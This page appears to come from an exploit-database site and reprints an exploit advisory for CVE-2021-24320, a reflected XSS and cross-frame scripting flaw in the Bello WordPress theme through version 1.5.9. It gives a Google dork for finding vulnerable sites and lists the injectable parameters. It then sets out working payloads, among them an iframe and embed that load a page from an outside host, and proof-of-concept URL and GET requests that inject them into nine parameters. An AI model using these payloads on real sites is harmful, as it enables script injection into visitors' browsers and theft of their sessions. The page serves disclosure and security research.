Advertisement






Bello WordPress Theme < = 1.5.9 - Unauthenticated Reflected XSS & XFS

CVE Category Price Severity
CVE-2021-24320 CWE-79 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2021-05-17
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050086

Below is a copy:

Bello WordPress Theme <= 1.5.9 - Unauthenticated Reflected XSS & XFS
/*!
- # VULNERABILITY: Bello WordPress Theme <= 1.5.9 - Unauthenticated Reflected XSS & XFS
- # GOOGLE DORK: inurl:/wp-content/themes/bello/
- # DATE: 2021-03-21
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: BoldThemes [ https://bold-themes.com ]
- # SOFTWARE VERSION: <= 1.5.9
- # SOFTWARE LINK: https://themeforest.net/item/bello-directory-listing-wordpress-theme/21815903
- # CVSS: AV:N/AC:L/PR:N/UI:R/S:C
- # CWE: CWE-79
- # CVE: CVE-2021-24320
*/



### -- [ Info: ]

[i] An Unauthenticated Reflected XSS & XFS vulnerabilities was discovered in the Bello theme through 1.5.9 for WordPress.

[i] Vulnerable parameter(s): &listing_list_view=, &bt_bb_listing_field_my_lat=, &bt_bb_listing_field_my_lng=, &bt_bb_listing_field_distance_value=, &bt_bb_listing_field_my_lat_default=, &bt_bb_listing_field_keyword=, &bt_bb_listing_field_location_autocomplete=, &bt_bb_listing_field_price_range_from= and &bt_bb_listing_field_price_range_to=.

[i] Plugin(s) affected: Bello by BoldThemes [ https://bold-themes.com ].



### -- [ Impact: ]

[~] Malicious JavaScript code or iFrame injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payloads: ]

[$] 13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`m0ze`);>

[$] <!--><embed src=https://m0ze.ru/payload/xfsii.html><iframe src=https://m0ze.ru/payload/xfsii.html></iframe>



### -- [ PoC | Unauthenticated Reflected XSS & XFS | Listing search query: ]

[!] https://bello.bold-themes.com/main-demo/listing/?listing_list_view=standard13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`listing_list_view`);%3E&bt_bb_listing_field_my_lat=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_my_lat`);%3E&bt_bb_listing_field_my_lng=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_my_lng`);%3E&bt_bb_listing_field_distance_value=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_distance_value`);%3E&bt_bb_listing_field_my_lat_default=13&bt_bb_listing_field_my_lng_default=13&bt_bb_listing_field_keyword=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_keyword`);%3E&bt_bb_listing_field_location_autocomplete=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_location_autocomplete`);%3E&bt_bb_listing_field_category=all&bt_bb_listing_field_price_range_from=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_price_range_from`);%3E&bt_bb_listing_field_price_range_to=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_price_range_to`);%3E

[!] GET /main-demo/listing/?listing_list_view=standard13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`listing_list_view`);%3E&bt_bb_listing_field_my_lat=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_my_lat`);%3E&bt_bb_listing_field_my_lng=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_my_lng`);%3E&bt_bb_listing_field_distance_value=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_distance_value`);%3E&bt_bb_listing_field_my_lat_default=13&bt_bb_listing_field_my_lng_default=13&bt_bb_listing_field_keyword=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_keyword`);%3E&bt_bb_listing_field_location_autocomplete=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_location_autocomplete`);%3E&bt_bb_listing_field_category=all&bt_bb_listing_field_price_range_from=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_price_range_from`);%3E&bt_bb_listing_field_price_range_to=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_price_range_to`);%3E HTTP/1.1
Host: bello.bold-themes.com



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum